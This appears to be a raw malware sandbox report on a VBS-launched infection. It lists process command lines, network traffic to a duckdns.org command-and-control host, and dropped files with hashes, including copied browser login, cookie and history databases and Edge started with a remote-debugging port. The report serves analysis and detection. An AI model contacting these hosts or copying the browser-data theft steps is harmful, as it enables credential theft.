"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2068,13222862998998336005,837772617709455761,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3372 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2068,13222862998998336005,837772617709455761,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5480 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2068,13222862998998336005,837772617709455761,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5488 /prefetch:1

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\kqunpdjlgxzyyubqzaztxmihsbp.vbs"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 drive.google.com udp
GB 142.250.187.206:443 drive.google.com tcp
US 8.8.8.8:53 206.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 68.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 drive.usercontent.google.com udp
GB 172.217.16.225:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 225.16.217.172.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
GB 142.250.187.206:443 drive.google.com tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.187.227:80 c.pki.goog tcp
US 8.8.8.8:53 o.pki.goog udp
GB 142.250.187.227:80 o.pki.goog tcp
GB 172.217.16.225:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 227.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 13hindi4pistatukoy4tra.duckdns.org udp
US 154.216.18.79:47392 13hindi4pistatukoy4tra.duckdns.org tcp
US 8.8.8.8:53 197.87.175.4.in-addr.arpa udp
US 154.216.18.79:47392 13hindi4pistatukoy4tra.duckdns.org tcp
US 154.216.18.79:47392 13hindi4pistatukoy4tra.duckdns.org tcp
US 154.216.18.79:47392 13hindi4pistatukoy4tra.duckdns.org tcp
US 8.8.8.8:53 geoplugin.net udp
NL 178.237.33.50:80 geoplugin.net tcp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 79.18.216.154.in-addr.arpa udp
US 8.8.8.8:53 50.33.237.178.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 3.213.58.216.in-addr.arpa udp
US 8.8.8.8:53 www.google.com udp
GB 142.250.180.4:443 www.google.com tcp
GB 142.250.180.4:443 www.google.com udp
US 8.8.8.8:53 ogads-pa.googleapis.com udp
US 8.8.8.8:53 apis.google.com udp
GB 172.217.169.74:443 ogads-pa.googleapis.com tcp
GB 216.58.201.110:443 apis.google.com tcp
US 8.8.8.8:53 4.180.250.142.in-addr.arpa udp
US 8.8.8.8:53 74.169.217.172.in-addr.arpa udp
US 8.8.8.8:53 110.201.58.216.in-addr.arpa udp
GB 172.217.169.74:443 ogads-pa.googleapis.com udp
N/A 127.0.0.1:9222 tcp
US 8.8.8.8:53 play.google.com udp
GB 172.217.16.238:443 play.google.com tcp
US 8.8.8.8:53 238.16.217.172.in-addr.arpa udp
N/A 127.0.0.1:9222 tcp
N/A 127.0.0.1:9222 tcp
N/A 127.0.0.1:9222 tcp
N/A 127.0.0.1:9222 tcp
N/A 224.0.0.251:5353 udp
N/A 127.0.0.1:9222 tcp
US 8.8.8.8:53 72.209.201.84.in-addr.arpa udp
US 154.216.18.79:47392 13hindi4pistatukoy4tra.duckdns.org tcp
US 154.216.18.79:47392 13hindi4pistatukoy4tra.duckdns.org tcp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 154.216.18.79:47392 13hindi4pistatukoy4tra.duckdns.org tcp
US 154.216.18.79:47392 13hindi4pistatukoy4tra.duckdns.org tcp

Files

memory/4004-4-0x00007FFE0C4F3000-0x00007FFE0C4F5000-memory.dmp

memory/4004-10-0x0000027D9C150000-0x0000027D9C172000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4gb2xdl0.zli.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4004-15-0x00007FFE0C4F0000-0x00007FFE0CFB1000-memory.dmp

memory/4004-16-0x00007FFE0C4F0000-0x00007FFE0CFB1000-memory.dmp

memory/4004-19-0x00007FFE0C4F3000-0x00007FFE0C4F5000-memory.dmp

memory/4004-20-0x00007FFE0C4F0000-0x00007FFE0CFB1000-memory.dmp

memory/4004-21-0x00007FFE0C4F0000-0x00007FFE0CFB1000-memory.dmp

memory/4004-24-0x00007FFE0C4F0000-0x00007FFE0CFB1000-memory.dmp

memory/1708-25-0x0000000002430000-0x0000000002466000-memory.dmp

memory/1708-26-0x0000000004F10000-0x0000000005538000-memory.dmp

memory/1708-27-0x0000000004E50000-0x0000000004E72000-memory.dmp

memory/1708-28-0x0000000005540000-0x00000000055A6000-memory.dmp

memory/1708-29-0x00000000055B0000-0x0000000005616000-memory.dmp

memory/1708-39-0x00000000056E0000-0x0000000005A34000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 71444def27770d9071039d005d0323b7
SHA1 cef8654e95495786ac9347494f4417819373427e
SHA256 8438eded7f1ab9b4399a069611fe8730226bcdce08fab861d4e8fae6ef621ec9
SHA512 a721af797fd6882e6595b7d9610334f1fb57b809e504452eed4b0d0a32aaf07b81ce007bd51605bec9fcea7ec9f1d8424db1f0f53b65a01126ec4f5980d86034

memory/1708-41-0x0000000005D20000-0x0000000005D3E000-memory.dmp

memory/1708-42-0x0000000005D70000-0x0000000005DBC000-memory.dmp

memory/1708-43-0x00000000075B0000-0x0000000007C2A000-memory.dmp

memory/1708-44-0x00000000062C0000-0x00000000062DA000-memory.dmp

memory/1708-45-0x0000000006FE0000-0x0000000007076000-memory.dmp

memory/1708-46-0x0000000006F40000-0x0000000006F62000-memory.dmp

memory/1708-47-0x00000000081E0000-0x0000000008784000-memory.dmp

C:\Users\Admin\AppData\Roaming\Khets.Ser

MD5 476d1adecfffa599951a00c40bda69d1
SHA1 ce36e9ef38b1486960013f67fe2aa459ca7c3d3f
SHA256 dc05f59a83dee2cd012c3a9d7e5ee28ba868670bb067495b1554b8c7d1b0dc03
SHA512 7a177ac89b7f54457ae29116be4188255d8977588cb18c377b9f91d20b06774bb17eb996ba199b9c364beb6433b63345c7043e6616526e2eff2d99c0398a72ea

memory/1708-49-0x0000000008790000-0x000000000B51E000-memory.dmp

memory/432-63-0x0000000001000000-0x0000000002254000-memory.dmp

memory/432-72-0x0000000020E40000-0x0000000020E74000-memory.dmp

memory/432-71-0x0000000020E40000-0x0000000020E74000-memory.dmp

memory/432-68-0x0000000020E40000-0x0000000020E74000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Local State

MD5 a72373c195c0a68e17638e0da248e886
SHA1 59ffc5242a67c144b4764e4ed05f5b5da167c7d6
SHA256 61c1bd21c09b4d9a4ac6cd18dcb71b1020c09428f33992fc471892331867236f
SHA512 aca92c3a6f48446cc78352f51a905a61b78a3879be9fdc60a7c1e08f14ef8d1d068c66c33c8ebf6221e3e6902e91705b794b673333306d413460700654649c50

memory/3328-81-0x0000000000400000-0x0000000000478000-memory.dmp

memory/4528-82-0x0000000000400000-0x0000000000462000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Secure Preferences

MD5 8fb5b9ba3b303f6c3caed559a563b9fe
SHA1 9697ad8495afb27aacdf5ad7359dd919ce22f0ce
SHA256 b2ae53cd2ededc97e559fee2ec6de52ba7aa615093d1a4ceaa86d53e879c6713
SHA512 30a776a4ca19360216eb8d66819e28001fe552194a12f1b2d3e802f5a8a1eb7a690ea2dd4cfe2c94324817bc683cf487009d925b0c0acf5997394146b9bf4566

memory/4528-90-0x0000000000400000-0x0000000000462000-memory.dmp

memory/3328-87-0x0000000000400000-0x0000000000478000-memory.dmp

memory/3328-85-0x0000000000400000-0x0000000000478000-memory.dmp

memory/1520-84-0x0000000000400000-0x0000000000424000-memory.dmp

memory/1520-83-0x0000000000400000-0x0000000000424000-memory.dmp

\??\pipe\crashpad_2728_MXVBHYQHSCMQFYFF

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Network\Cookies

MD5 c17cdcbdc578615d8d9ef76d8d0f168a
SHA1 c5d2700302cb14f6445d1d8859a58af32afa2647
SHA256 da30cd6d191dfc6a5774d2e7f3a1ab6fed11cce78f14071665a7b348969227fa
SHA512 d03af87a83fce8025b3d68c693dcaf8b72946cff2914521acbf5fdcc73d85e2c88785163031aea8ba94a23ed7e14356a345180c967341c8117db57f4b6813ccd

memory/4528-101-0x0000000000400000-0x0000000000462000-memory.dmp

memory/1520-89-0x0000000000400000-0x0000000000424000-memory.dmp

memory/3328-88-0x0000000000400000-0x0000000000478000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Local Storage\leveldb\MANIFEST-000001

MD5 5af87dfd673ba2115e2fcf5cfdb727ab
SHA1 d5b5bbf396dc291274584ef71f444f420b6056f1
SHA256 f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4
SHA512 de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Local Storage\leveldb\CURRENT

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

C:\Users\Admin\AppData\Local\Temp\TmpUserData\GraphiteDawnCache\data_3

MD5 41876349cb12d6db992f1309f22df3f0
SHA1 5cf26b3420fc0302cd0a71e8d029739b8765be27
SHA256 e09f42c398d688dce168570291f1f92d079987deda3099a34adb9e8c0522b30c
SHA512 e9a4fc1f7cb6ae2901f8e02354a92c4aaa7a53c640dcf692db42a27a5acc2a3bfb25a0de0eb08ab53983132016e7d43132ea4292e439bb636aafd53fb6ef907e

C:\Users\Admin\AppData\Local\Temp\TmpUserData\GraphiteDawnCache\data_2

MD5 0962291d6d367570bee5454721c17e11
SHA1 59d10a893ef321a706a9255176761366115bedcb
SHA256 ec1702806f4cc7c42a82fc2b38e89835fde7c64bb32060e0823c9077ca92efb7
SHA512 f555e961b69e09628eaf9c61f465871e6984cd4d31014f954bb747351dad9cea6d17c1db4bca2c1eb7f187cb5f3c0518748c339c8b43bbd1dbd94aeaa16f58ed

C:\Users\Admin\AppData\Local\Temp\TmpUserData\GraphiteDawnCache\data_1

MD5 d0d388f3865d0523e451d6ba0be34cc4
SHA1 8571c6a52aacc2747c048e3419e5657b74612995
SHA256 902f30c1fb0597d0734bc34b979ec5d131f8f39a4b71b338083821216ec8d61b
SHA512 376011d00de659eb6082a74e862cfac97a9bb508e0b740761505142e2d24ec1c30aa61efbc1c0dd08ff0f34734444de7f77dd90a6ca42b48a4c7fad5f0bddd17

C:\Users\Admin\AppData\Local\Temp\TmpUserData\GraphiteDawnCache\data_0

MD5 cf89d16bb9107c631daabf0c0ee58efb
SHA1 3ae5d3a7cf1f94a56e42f9a58d90a0b9616ae74b
SHA256 d6a5fe39cd672781b256e0e3102f7022635f1d4bb7cfcc90a80fffe4d0f3877e
SHA512 8cb5b059c8105eb91e74a7d5952437aaa1ada89763c5843e7b0f1b93d9ebe15ed40f287c652229291fac02d712cf7ff5ececef276ba0d7ddc35558a3ec3f77b0

C:\Users\Admin\AppData\Local\Temp\ykhtyvi

MD5 7aca43b2800ceb18b3ed2326532545de
SHA1 d4cf207ef85bd749d59c1cb27a09c167ee21523a
SHA256 3d9f8622d97587fd84d3d0560a50ab38e5f894fe4b5bcaa34279643fdaaeb480
SHA512 0e002e6b8d965c227d9b1aa7c0251619c787ec7717e59667e756e5815e3666a955ea397eb148a1ed6bb7d8045727e4efa656a103f14bc70a03b03f0c91283c2f

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Network\SCT Auditing Pending Reports

MD5 d751713988987e9331980363e24189ce
SHA1 97d170e1550eee4afc0af065b78cda302a97674c
SHA256 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512 b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

memory/432-213-0x0000000021860000-0x0000000021879000-memory.dmp

memory/432-212-0x0000000021860000-0x0000000021879000-memory.dmp

memory/432-209-0x0000000021860000-0x0000000021879000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad\settings.dat

MD5 e2f5d4717e3eafb8de215e3435deae4a
SHA1 1edb0025c7db8ae00e20bdad35429615a5d7d365
SHA256 368c28ae3ff41abc5cab8e75775db13d3fa6bb8a4257c5fa5a35da77eef74fb9
SHA512 86c44ee6bf1b905aabb48b9e7615e6b8c0433f22b5729dcf003aab0932db3efd9dfbdb1e3654f43e7a5a05aa015fa26e5437ecf5964abbb742b9cd11155897a8

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad\throttle_store.dat

MD5 9e4e94633b73f4a7680240a0ffd6cd2c
SHA1 e68e02453ce22736169a56fdb59043d33668368f
SHA256 41c91a9c93d76295746a149dce7ebb3b9ee2cb551d84365fff108e59a61cc304
SHA512 193011a756b2368956c71a9a3ae8bc9537d99f52218f124b2e64545eeb5227861d372639052b74d0dd956cb33ca72a9107e069f1ef332b9645044849d14af337

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad\settings.dat

MD5 a890c65af1a525e1d4a63b0ec8d2ae05
SHA1 1aaa0f996ca686d26f88a1527259b97ed504b6ec
SHA256 740af2cbfcb709f25e40761f5309332f1488cb8c070371af89630766e4cd7936
SHA512 17bc47302115628d7940671f550f2cab8fbd8daf6ff91b8c192fb28b8c8fffc460b03be537d1257cdaf987b07d8e04409c41d883e25311c4252ea1903c440709

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Local State

MD5 f9f5d178599dd2d1a9eb18853a4035e1
SHA1 0a3ea5ae4a5e1372ecccd279edd241453fa74d19
SHA256 d503a45ed2232d0ab50dae6354fefb7a2bce587aec55541fe13262ffbaab5f68
SHA512 3e69aaa1c9f3669d087fbd625d68b5ea052a9246cc1665277300517dd4b1187f531eb5d5bdf5a492abdd24d2333d3b8565b1831aafad471a138d1129e096ca10

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad\settings.dat

MD5 c9745625dbd5f0bb251d752db1443a7f
SHA1 0aef110c8c9bea054702192718b883e8d917d02f
SHA256 f94f32b9046eabb2dde29989504b4c5911ff3a36f45a9c8faf0b204e9778506c
SHA512 a7d8c9dd6c5174cfb527720da4cce2105f290e4ef18f5cdb6aaab1446a5b1b241abaedee581ef7f972edb9511fc04b3494791791b2f587a024327417e4ab4c5a

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Favicons

MD5 b40e1be3d7543b6678720c3aeaf3dec3
SHA1 7758593d371b07423ba7cb84f99ebe3416624f56
SHA256 2db221a44885c046a4b116717721b688f9a026c4cae3a17cf61ba9bef3ad97f4
SHA512 fb0664c1c83043f7c41fd0f1cc0714d81ecd71a07041233fb16fefeb25a3e182a77ac8af9910eff81716b1cceee8a7ee84158a564143b0e0d99e00923106cc16

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Preferences

MD5 75b40455c9a028f3930bfe2611baef9b
SHA1 1efd55860c3fc15c44fbf5ff35ccb8f4e0a5b8f3
SHA256 ef3c2b9e19dfb137f6a7e9bfd6ec6713382a7349648db28ce22ed4fefd797516
SHA512 4d44c5d35ef7eafd4805621a6557694eeba9bb2b720a3ba903bccd572154fb943c240f23bd8e4dd2ea0a0d1ee055976e4b413043e645bb050d26315e018a73dc

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Last Version

MD5 838a7b32aefb618130392bc7d006aa2e
SHA1 5159e0f18c9e68f0e75e2239875aa994847b8290
SHA256 ac3dd2221d90b09b795f1f72e72e4860342a4508fe336c4b822476eb25a55eaa
SHA512 9e350f0565cc726f66146838f9cebaaa38dd01892ffab9a45fe4f72e5be5459c0442e99107293a7c6f2412c71f668242c5e5a502124bc57cbf3b6ad8940cb3e9

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Login Data

MD5 a182561a527f929489bf4b8f74f65cd7
SHA1 8cd6866594759711ea1836e86a5b7ca64ee8911f
SHA256 42aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914
SHA512 9bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Site Characteristics Database\000003.log

MD5 148079685e25097536785f4536af014b
SHA1 c5ff5b1b69487a9dd4d244d11bbafa91708c1a41
SHA256 f096bc366a931fba656bdcd77b24af15a5f29fc53281a727c79f82c608ecfab8
SHA512 c2556034ea51abfbc172eb62ff11f5ac45c317f84f39d4b9e3ddbd0190da6ef7fa03fe63631b97ab806430442974a07f8e81b5f7dc52d9f2fcdc669adca8d91f

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Sync Data\LevelDB\000003.log

MD5 90881c9c26f29fca29815a08ba858544
SHA1 06fee974987b91d82c2839a4bb12991fa99e1bdd
SHA256 a2ca52e34b6138624ac2dd20349cde28482143b837db40a7f0fbda023077c26a
SHA512 15f7f8197b4fc46c4c5c2570fb1f6dd73cb125f9ee53dfa67f5a0d944543c5347bdab5cce95e91dd6c948c9023e23c7f9d76cff990e623178c92f8d49150a625

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Visited Links

MD5 21f9a02313b14627811b73a1245f619b
SHA1 5ea3bfdfb9312c166a9d11fc318dfde8aad7fc4d
SHA256 c027e3d3f757c66059e65ce22dda623fc4f01483e0b8430ff29f567e7013a167
SHA512 5812b107ecf3abb9a1de6d082a26c07f5099234e60e35f7cd8c6ae137f0a03a35e9e69410fa151441eedc86ef1ed2b21c3374e0084b6440847ac457737e2981e

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Site Characteristics Database\LOG

MD5 8c30f103334954d039fdd8be23cb97d1
SHA1 c695bae719073ed4913764280df6febcfc340821
SHA256 31913820f9828753cd3b38c4242b9f46b21710f55ea424b738d2330098931ca6
SHA512 005440876ff6a7380b2d4a3cc9ffe44eacab74437d589763d16cfd488de002fab521e133fadd8f0ef0c6db9fad1c04cb5a881869c0524b466a57ae4f3c04fe72

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Code Cache\js\index

MD5 54cb446f628b2ea4a5bce5769910512e
SHA1 c27ca848427fe87f5cf4d0e0e3cd57151b0d820d
SHA256 fbcfe23a2ecb82b7100c50811691dde0a33aa3da8d176be9882a9db485dc0f2d
SHA512 8f6ed2e91aed9bd415789b1dbe591e7eab29f3f1b48fdfa5e864d7bf4ae554acc5d82b4097a770dabc228523253623e4296c5023cf48252e1b94382c43123cb0

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Top Sites

MD5 986962efd2be05909f2aaded39b753a6
SHA1 657924eda5b9473c70cc359d06b6ca731f6a1170
SHA256 d5dddbb1fbb6bbf2f59b9d8e4347a31b6915f3529713cd39c0e0096cea4c4889
SHA512 e2f086f59c154ea8a30ca4fa9768a9c2eb29c0dc2fe9a6ed688839853d90a190475a072b6f7435fc4a1b7bc361895086d3071967384a7c366ce77c6771b70308

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad\settings.dat

MD5 22462e7bd116366c410ba2ee97a46267
SHA1 0debc9cbf4156b74673ce2b32469b3bc609e754d
SHA256 df93690ea7df9121dbca44dd2127718366e615e57f15221a94de2e791d15be29
SHA512 329117c7e8cad2f6ed82f278168ad0a4b974c0727bc690930558153b0e994fff8708c1589a02d4c367219ba30b101bd788d4d58ea95ad117a0a1028847b03a07

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\GPUCache\index

MD5 60edeab40b0e636767cb77040663fa8c
SHA1 d62e5a1f8716a085351a85f2cbd62161e300dbc5
SHA256 6e63ddaa656ffac5cc79fce6eff8b65a07aff813a332e4f02d4778d4220ffbc2
SHA512 a73c2e5260c6229fa3b703c0ee2b59d993a2bfc449986ff481bd5bc46808f36f222ef0d2d215099675dcb9f895f3c5f3beea9ea0918aef0653f0a686a822c865

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\History

MD5 d30bfa66491904286f1907f46212dd72
SHA1 9f56e96a6da2294512897ea2ea76953a70012564
SHA256 25bee9c6613b6a2190272775a33471a3280bd9246c386b72d872dc6d6dd90907
SHA512 44115f5aaf16bd3c8767bfb5610eba1986369f2e91d887d20a9631807c58843434519a12c9fd23af38c6adfed4dbf8122258279109968b37174a001320839237

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\shared_proto_db\LOG

MD5 8a001c7144415e9d1d211d17bf31d1e2
SHA1 95d7d175391d5cda739e18d5e170b7f4557946e5
SHA256 24eb83fb93099cecce73a405afea2b4b8ab7c867bb162cabd0e4fb994fee2524
SHA512 19ab7aa8fb75dc389466bf61d7de579a58e522a8c1c5a46fd191655a42465480e41b319ae793df4f286b499af088536c4896166043c80d7733eabb4009c30c0f

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Session Storage\000003.log

MD5 69449520fd9c139c534e2970342c6bd8
SHA1 230fe369a09def748f8cc23ad70fd19ed8d1b885
SHA256 3f2e9648dfdb2ddb8e9d607e8802fef05afa447e17733dd3fd6d933e7ca49277
SHA512 ea34c39aea13b281a6067de20ad0cda84135e70c97db3cdd59e25e6536b19f7781e5fc0ca4a11c3618d43fc3bd3fbc120dd5c1c47821a248b8ad351f9f4e6367

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\8b6e5bb9-25e8-4d82-92c7-b5f942ef89a8.tmp

MD5 c38984d9e805bb09f0e562313795a845
SHA1 333960846b2938feda52e197ed27fabc14ae97bf
SHA256 d99a80b79897ec4db99d5b6f73166e316e5f8de97afe7d3115986cee4faeda88
SHA512 c2d861a737d8a600e4d6a2e70c6e5bc4e17057478570fff308e76ab7f47240673f30d72d3b43b82bed155ba3574cfb0ee5a931563de8369a20df6365d4faed63

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Local Storage\leveldb\LOG

MD5 d4b76f0f52bb2a15e81af07a40c6b4c1
SHA1 987129f944f6e0a81012bc628a2bc961a5c4e4d3
SHA256 97c1ef1039704d159e5922f002a53604c200ef6157e7c90805ab45b294a11ff6
SHA512 f04dd2e289c5e378a1be1cb957582465e524b625ff9990fec8542134c679b825bb7f7cf4ebd30f72fcd82c26d5534e2e19bac9764222be8b763a118d348b4047

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Session Storage\LOG

MD5 68f2fa2c1e637fee71ede032f391dcce
SHA1 3094ed5d5c740fee500d6bfb2b4eb7994f2a2c70
SHA256 3faa0680f636dff455d578cfb83afdbfb419a6721e66509de5bd9de354c370b2
SHA512 61087d0f0571dc378abb90ffca52bc4986f4a6639637dc1274214947b1b1af7ed382694613a8a6bee799950b4f31243eb0c4d1aa8aec79d41fed40817debd4c2

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\shared_proto_db\000003.log

MD5 7f4d7f3ee4f94ddb23aa0938572191ac
SHA1 c1a433117ac6811d4f3300e01f87edea4368d213
SHA256 25bb260fe79c75684754769702e6a1cb9ebef3f1469bde87b426f6b0f8cdbbd6
SHA512 5b2637d407909adc5e7917b1fee187ce435c60961a2b256fa46f4492ad0f6d15a33c9f95b560a7db1013505a35af9fc349259cd83fa75a0f03cc633c0fb0db18

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\shared_proto_db\metadata\000003.log

MD5 0a075fb8a1fdb2f919fc00566c615d59
SHA1 3b3350d583cd6d17cce55b59dc63311ab4e0d7d8
SHA256 f41738cdeb85511e264d68f4785fba7046d0ee794ca5f3ab14b7ab929be0e2c1
SHA512 b524973f0474516563315c913ad126d218a1404e12239c30ee776e2da2e0689ed202137a8e93eef1ea3a8d5d18e3b4a0eb8e29fb099674a61d5a3e2a720d1c20

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\shared_proto_db\metadata\LOG

MD5 a730900258ed38858b9fbfa2ff5ce2c7
SHA1 40c70f2c15b8cabc31fd17369c8b339b8f4eba1a
SHA256 d8bbce03e2da15a835a126ff8842aae4411ea41bcffd84bafad35e7fe50a64a2
SHA512 9bc19fdda38139cea1f0f0ccaba1493dec6973d0230e563f92eb0f04e08d89fbe565f939ae0678cc8dbdc7765ec60678c81d0a51a62be610cda933d6f6067154

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Code Cache\wasm\index-dir\the-real-index

MD5 0d2128728e031357994ae4fa5fd00e34
SHA1 d860bb10fe672c8be6e4fcc2ed3d0b1384d18546
SHA256 f6415e7c2a5df89219bebe4166d6780c188829a29d5851b8f2f2b01cec3ad40a
SHA512 e26876b3dd96af8286874989ff7b7de9f35057f0d64ab9a52bfa536dd7dabffd5ac9a67d72afb98ace859778fed9d65ea614b57f200ee412fba1855347bbaffb

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Code Cache\js\index-dir\the-real-index

MD5 1cdfa1da39b0d3cfd540b1bff6ba3a75
SHA1 49db4f45753597a2d4c7b666f11a3ca97636b961
SHA256 4189a9eaf3b6f10d2d2757ad7339247d4e32b4bd3953e59d0f6f2041982fe664
SHA512 172df124e1657835244f02de12775fc157eb494bb1b3e09ac73fb72f3d4550c0199e2f77cdb7634461b71d64f4c5f84646b0a40df39566c8a37eada9a67f86c4

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Service Worker\Database\000003.log

MD5 9082ba76dad3cf4f527b8bb631ef4bb2
SHA1 4ab9c4a48c186b029d5f8ad4c3f53985499c21b0
SHA256 bff851dedf8fc3ce1f59e7bcd3a39f9e23944bc7e85592a94131e20fd9902ddd
SHA512 621e39d497dece3f3ddf280e23d4d42e4be8518e723ecb82b48f8d315fc8a0b780abe6c7051c512d7959a1f1def3b10b5ed229d1a296443a584de6329275eb40

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Service Worker\Database\LOG

MD5 9ede785060bfaf9fce4cef66098cd066
SHA1 ac865f1b67fd146d068bf3c746bf4d4a66dbcde3
SHA256 68d1078dff980d0c06a5e05eddf8c9b296db694d7f0149210efb33260685ec9a
SHA512 4f9b6f73d6c9f5c3eb3c21ed298a88a47ca699103aba7ea9ab853f084d5ebd0434ebe97c09f66e2376f38ecae372ccbf4823d390447fbb06700c0494de33499a

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Sync Data\LevelDB\LOG

MD5 29dd59136b751e60185d95a980e9b248
SHA1 3b150ac92ff9933789837689b51a11b03c1836de
SHA256 78dd8471a19ae8ad1260d0a748f2821636b31c56fad5dd6ab4b486aca9165180
SHA512 0ee45e32fbd2f769b7f9ee111c69071d315b49081eee31cce64be59b87bea876aee956ed46cab22f0ea8285e677a3a39e76f3fca28bb824da4160193bf6b5535

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Web Data

MD5 0e531c73e648f37d820d329f351521d0
SHA1 f7e00301bba3b5ca13cda7ae552a9b9b640088c9
SHA256 0b4dbf8aa5e5382a7880aa552ec8e03188d80d622aafc47840ec2469cefcacca
